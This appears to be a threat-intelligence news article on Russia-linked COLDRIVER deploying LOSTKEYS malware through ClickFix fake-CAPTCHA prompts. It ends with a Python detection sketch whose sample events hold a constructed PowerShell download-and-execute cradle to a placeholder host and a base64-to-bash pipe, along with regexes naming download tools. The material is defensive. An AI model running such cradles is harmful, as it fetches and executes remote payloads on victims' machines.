Russian Hackers Using ClickFix Fake CAPTCHA to Deploy New LOSTKEYS Malware

The threat actor known as COLDRIVER, linked to Russia, has been found distributing a new malware named LOSTKEYS as part of an espionage-focused operation using ClickFix-style social engineering tactics.

The Google Threat Intelligence Group (GTIG) stated that “LOSTKEYS is capable of stealing files from a predefined list of extensions and directories, as well as sending system information and running processes to the attacker.”

GTIG reported that LOSTKEYS was detected in attacks on advisors to Western governments and militaries, journalists, think tanks, NGOs, and individuals linked to Ukraine in January, March, and April 2025. The malware marks the second custom tool attributed to COLDRIVER after SPICA, indicating a shift from their traditional credential phishing activities.


Security researcher Wesley Shields mentioned, “COLDRIVER is known for stealing credentials and exfiltrating emails and contact lists from compromised accounts. In some cases, they also deliver malware to target devices and attempt to access files on the system.”

The recent attacks start with a fake CAPTCHA verification prompt on a decoy website, instructing victims to run a PowerShell command through a widely used social engineering technique known as ClickFix.

The PowerShell command downloads and executes the next payload from a remote server before deploying LOSTKEYS on the compromised host, enabling the threat actor to gather system information, running processes, and files specified in a predefined list of extensions and directories.

Similar to SPICA, LOSTKEYS is deployed selectively, highlighting the highly targeted nature of these attacks.

A Base64-encoded blob serves as the third-stage payload, decoded into a PowerShell script responsible for executing LOSTKEYS, allowing the threat actor to gather system information and files from specified extensions and directories.

Additional artifacts of LOSTKEYS dating back to December 2023 were discovered by Google, posing as binaries related to the Maltego open-source investigation platform. It’s unclear whether these earlier samples are linked to COLDRIVER or whether the malware was repurposed by the threat actor starting in January 2025.

ClickFix Adoption on the Rise

ClickFix is being increasingly adopted by various threat actors to distribute a range of malware families, including Lampion, a banking trojan, and Atomic Stealer.

Attacks involving Lampion use phishing emails with ZIP file attachments containing an HTML file that redirects recipients to a fake landing page with ClickFix instructions to initiate the infection process.

Unit 42 from Palo Alto Networks revealed that the Lampion infection chain consists of several non-consecutive stages executed as separate processes, complicating detection due to the dispersed execution flow.

The malicious campaign targeted Portuguese-speaking entities in government, finance, and transportation sectors.


Recent months have seen ClickFix combined with EtherHiding, which uses Binance Smart Chain contracts to conceal payloads and deliver the macOS information stealer Atomic Stealer.

An independent researcher known as Badbyte explained that users triggering the Binance Smart Contract are prompted to run a Base64-encoded command in Terminal via macOS-specific shortcuts, leading to the execution of Atomic Stealer.

The campaign, dubbed MacReaper, compromised approximately 2,800 legitimate websites to serve fake CAPTCHA prompts, employing obfuscated JavaScript, full-screen iframes, and blockchain-based command infrastructure to maximize infections.

The researcher highlighted, “The attack leverages obfuscated JavaScript, three full-screen iframes, and blockchain-based command infrastructure to maximize infections.”
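Both the Windows chain described above (a pasted PowerShell command that downloads the next stage, with a Base64-encoded later stage) and the macOS variant (a Base64-encoded command pasted into Terminal) leave a similar footprint in process-creation telemetry. The detection sketch below is an added example, not code from GTIG, Unit 42 or the researcher; the events, the URL and the indicator names are constructed, and the threshold is an assumption.

```python
import base64
import re

# Constructed process-creation events (Sysmon/4688-style fields), not data from the
# article: a Windows ClickFix paste, a benign admin script, a macOS Terminal paste
# of a base64 pipeline, and an editor-launched shell. The URL is a placeholder.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "cmdline": "powershell -w hidden -enc " + base64.b64encode(
        "iwr http://example.invalid/stage2 | iex".encode("utf-16le")).decode()},
    {"parent": "explorer.exe", "cmdline": "powershell -NoProfile -File C:\\ops\\backup.ps1"},
    {"parent": "Terminal", "cmdline": "echo aGVsbG8= | base64 -d | bash"},
    {"parent": "code.exe", "cmdline": "powershell -Command Get-Process"},
]

DOWNLOAD_CRADLE = re.compile(
    r"\b(iwr|invoke-webrequest|downloadstring|curl|wget|iex|invoke-expression)\b", re.I)
ENCODED_FLAG = re.compile(r"\s-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_FLAG = re.compile(r"\s-w(indowstyle)?\s+hidden\b", re.I)
MAC_DECODE_PIPE = re.compile(r"base64\s+(-d|--decode)\s*\|\s*(ba|z)?sh\b", re.I)

def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload decoded as UTF-16LE, or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def clickfix_indicators(event):
    """Return the names of the ClickFix traits present in one event."""
    hits, cmd = [], event["cmdline"]
    # Run dialog / Terminal lineage: the user pasted the command by hand
    if event["parent"].lower() in ("explorer.exe", "terminal"):
        hits.append("interactive_shell_parent")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        hits.append("encoded_command")
        cmd += " " + decoded  # inspect the decoded script as well
    if HIDDEN_FLAG.search(cmd):
        hits.append("hidden_window")
    if DOWNLOAD_CRADLE.search(cmd):
        hits.append("download_cradle")
    if MAC_DECODE_PIPE.search(cmd):
        hits.append("base64_pipe_to_shell")
    return hits

def flag_events(events, threshold=2):
    """Keep events with at least `threshold` traits; a lone pasted script is not enough."""
    return [(e["cmdline"], h) for e in events if len(h := clickfix_indicators(e)) >= threshold]
```

Running `flag_events(SAMPLE_EVENTS)` surfaces only the Windows and macOS pastes; the admin script launched from the Run dialog scores one trait and is left alone.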
